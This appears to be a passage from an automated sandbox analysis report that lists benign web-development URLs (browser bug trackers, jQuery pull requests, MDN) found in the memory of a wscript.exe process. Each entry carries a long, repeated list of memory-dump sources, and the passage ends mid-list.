Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=491668
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=649285
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=333868
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=378607
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=449857
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jquery/jquery/pull/764
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 